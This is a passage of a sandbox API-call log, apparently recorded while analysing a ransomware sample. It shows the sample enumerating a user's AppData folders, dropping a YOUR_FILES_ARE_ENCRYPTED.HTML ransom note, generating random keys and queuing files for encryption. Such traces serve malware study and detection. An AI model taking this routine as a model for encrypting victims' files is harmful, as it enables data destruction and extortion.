dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.256] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39dae0e3, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x39dae0e3, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x39dae0e3, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="{AC5765F8-E5EC-4047-9FC2-B8EC41C74849} - OProcSessId.dat", cAlternateFileName="{AC576~1.DAT")) returned 1 [0122.256] StrStrIW (lpFirst="{AC5765F8-E5EC-4047-9FC2-B8EC41C74849} - OProcSessId.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.256] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\{AC5765F8-E5EC-4047-9FC2-B8EC41C74849} - OProcSessId.dat") returned 101 [0122.256] PathFindExtensionW (pszPath="{AC5765F8-E5EC-4047-9FC2-B8EC41C74849} - OProcSessId.dat") returned=".dat" [0122.256] lstrlenW (lpString=".dat") returned 4 [0122.256] PathFindExtensionW (pszPath="{AC5765F8-E5EC-4047-9FC2-B8EC41C74849} - OProcSessId.dat") returned=".dat" [0122.256] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\{AC5765F8-E5EC-4047-9FC2-B8EC41C74849} - OProcSessId.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\{ac5765f8-e5ec-4047-9fc2-b8ec41c74849} - oprocsessid.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.262] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=0) returned 1 [0122.262] CloseHandle (hObject=0x308) returned 1 [0122.262] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66a20fae, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x66a20fae, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x66a20fae, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="~DF237F6FB287E83286.TMP", cAlternateFileName="~DF237~1.TMP")) returned 1 [0122.262] StrStrIW (lpFirst="~DF237F6FB287E83286.TMP", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.262] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\~DF237F6FB287E83286.TMP") returned 68 [0122.262] PathFindExtensionW (pszPath="~DF237F6FB287E83286.TMP") returned=".TMP" [0122.262] lstrlenW (lpString=".TMP") returned 4 [0122.262] PathFindExtensionW (pszPath="~DF237F6FB287E83286.TMP") returned=".TMP" [0122.262] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x509618de, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x509618de, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x509618de, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="~DFAD5479B78D41B83B.TMP", cAlternateFileName="~DFAD5~1.TMP")) returned 1 [0122.262] StrStrIW (lpFirst="~DFAD5479B78D41B83B.TMP", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.262] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\~DFAD5479B78D41B83B.TMP") returned 68 [0122.262] PathFindExtensionW (pszPath="~DFAD5479B78D41B83B.TMP") returned=".TMP" [0122.262] lstrlenW (lpString=".TMP") returned 4 [0122.262] PathFindExtensionW (pszPath="~DFAD5479B78D41B83B.TMP") returned=".TMP" [0122.262] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x500a7ccf, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x500a7ccf, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x500a7ccf, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="~DFBED0F39209CDA638.TMP", cAlternateFileName="~DFBED~1.TMP")) returned 1 [0122.262] StrStrIW (lpFirst="~DFBED0F39209CDA638.TMP", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.262] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\~DFBED0F39209CDA638.TMP") returned 68 [0122.263] PathFindExtensionW (pszPath="~DFBED0F39209CDA638.TMP") returned=".TMP" [0122.263] lstrlenW (lpString=".TMP") returned 4 [0122.263] PathFindExtensionW (pszPath="~DFBED0F39209CDA638.TMP") returned=".TMP" [0122.263] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x559521c1, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x559521c1, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x559521c1, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="~DFC8B44DBA6D9257D2.TMP", cAlternateFileName="~DFC8B~1.TMP")) returned 1 [0122.263] StrStrIW (lpFirst="~DFC8B44DBA6D9257D2.TMP", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.263] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\~DFC8B44DBA6D9257D2.TMP") returned 68 [0122.263] PathFindExtensionW (pszPath="~DFC8B44DBA6D9257D2.TMP") returned=".TMP" [0122.263] lstrlenW (lpString=".TMP") returned 4 [0122.263] PathFindExtensionW (pszPath="~DFC8B44DBA6D9257D2.TMP") returned=".TMP" [0122.263] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x559521c1, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x559521c1, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x559521c1, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="~DFC8B44DBA6D9257D2.TMP", cAlternateFileName="~DFC8B~1.TMP")) returned 0 [0122.263] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0122.263] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0122.263] GetProcessHeap () returned 0x600000 [0122.263] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0122.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0122.264] WriteFile (in: hFile=0x30c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0122.265] CloseHandle (hObject=0x30c) returned 1 [0122.265] GetProcessHeap () returned 0x600000 [0122.265] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0122.265] GetProcessHeap () returned 0x600000 [0122.265] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0122.268] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0122.268] StrStrIW (lpFirst="Temporary Internet Files", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.268] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temporary Internet Files") returned 64 [0122.268] GetProcessHeap () returned 0x600000 [0122.268] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0122.269] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temporary Internet Files" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temporary Internet Files") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temporary Internet Files" [0122.269] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temporary Internet Files", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temporary Internet Files\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temporary Internet Files\\*" [0122.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x559521c1, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x559521c1, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x559521c1, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="~DFC8B44DBA6D9257D2.TMP", cAlternateFileName="翿")) returned 0xffffffff [0122.269] GetProcessHeap () returned 0x600000 [0122.270] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0122.270] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40a64b1d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0122.270] StrStrIW (lpFirst="TileDataLayer", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.270] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer") returned 53 [0122.270] GetProcessHeap () returned 0x600000 [0122.270] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0122.270] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer" [0122.270] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\*" [0122.270] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40a64b1d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0122.270] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40a64b1d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="..", cAlternateFileName="")) returned 1 [0122.270] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4dfbc776, ftLastAccessTime.dwHighDateTime=0x1d70502, ftLastWriteTime.dwLowDateTime=0x4dfbc776, ftLastWriteTime.dwHighDateTime=0x1d70502, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Database", cAlternateFileName="")) returned 1 [0122.270] StrStrIW (lpFirst="Database", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.270] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database") returned 62 [0122.270] GetProcessHeap () returned 0x600000 [0122.270] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0122.271] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database" [0122.271] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\*" [0122.271] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4dfbc776, ftLastAccessTime.dwHighDateTime=0x1d70502, ftLastWriteTime.dwLowDateTime=0x4dfbc776, ftLastWriteTime.dwHighDateTime=0x1d70502, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f320, dwReserved1=0x1c00001c, cFileName=".", cAlternateFileName="")) returned 0x626638 [0122.272] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4dfbc776, ftLastAccessTime.dwHighDateTime=0x1d70502, ftLastWriteTime.dwLowDateTime=0x4dfbc776, ftLastWriteTime.dwHighDateTime=0x1d70502, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f320, dwReserved1=0x1c00001c, cFileName="..", cAlternateFileName="")) returned 1 [0122.272] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40ab0ffe, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40ab0ffe, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e9834a7, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62f320, dwReserved1=0x1c00001c, cFileName="EDB.chk", cAlternateFileName="")) returned 1 [0122.272] StrStrIW (lpFirst="EDB.chk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.272] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB.chk") returned 70 [0122.272] PathFindExtensionW (pszPath="EDB.chk") returned=".chk" [0122.272] lstrlenW (lpString=".chk") returned 4 [0122.272] PathFindExtensionW (pszPath="EDB.chk") returned=".chk" [0122.272] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a8cb5a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91b1873a, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x62f320, dwReserved1=0x1c00001c, cFileName="EDB.log", cAlternateFileName="")) returned 1 [0122.272] StrStrIW (lpFirst="EDB.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.272] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB.log") returned 70 [0122.272] PathFindExtensionW (pszPath="EDB.log") returned=".log" [0122.272] lstrlenW (lpString=".log") returned 4 [0122.272] PathFindExtensionW (pszPath="EDB.log") returned=".log" [0122.272] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0122.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\edb.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0122.273] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8db19be0, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x4e008d83, ftLastWriteTime.dwHighDateTime=0x1d70502, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x62f320, dwReserved1=0x1c00001c, cFileName="EDB00005.log", cAlternateFileName="")) returned 1 [0122.273] StrStrIW (lpFirst="EDB00005.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.273] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log") returned 75 [0122.273] PathFindExtensionW (pszPath="EDB00005.log") returned=".log" [0122.273] lstrlenW (lpString=".log") returned 4 [0122.273] PathFindExtensionW (pszPath="EDB00005.log") returned=".log" [0122.273] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0122.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\edb00005.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0122.274] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=2097152) returned 1 [0122.274] GetProcessHeap () returned 0x600000 [0122.274] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.278] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="5D") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="9A") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="28") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="B0") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="28") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="8E") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="12") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="CD") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="A3") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="6B") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="01") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="62") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="30") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="09") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="13") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="E8") returned 2 [0122.278] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="4B") returned 2 [0122.279] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="77") returned 2 [0122.279] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="9E") returned 2 [0122.279] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="8C") returned 2 [0122.279] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="AF") returned 2 [0122.279] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="03") returned 2 [0122.279] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="EC") returned 2 [0122.279] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="D8") returned 2 [0122.279] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="58") returned 2 [0122.279] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="B6") returned 2 [0122.279] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="64") returned 2 [0122.279] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="5F") returned 2 [0122.279] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="CD") returned 2 [0122.279] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="CD") returned 2 [0122.279] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="90") returned 2 [0122.279] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="1A") returned 2 [0122.280] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log" [0122.280] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.280] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.281] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40ab0ffe, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40ab0ffe, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40ab0ffe, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x62f320, dwReserved1=0x1c00001c, cFileName="EDBres00001.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0122.286] StrStrIW (lpFirst="EDBres00001.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.286] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDBres00001.jrs") returned 78 [0122.286] PathFindExtensionW (pszPath="EDBres00001.jrs") returned=".jrs" [0122.286] lstrlenW (lpString=".jrs") returned 4 [0122.286] PathFindExtensionW (pszPath="EDBres00001.jrs") returned=".jrs" [0122.286] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, 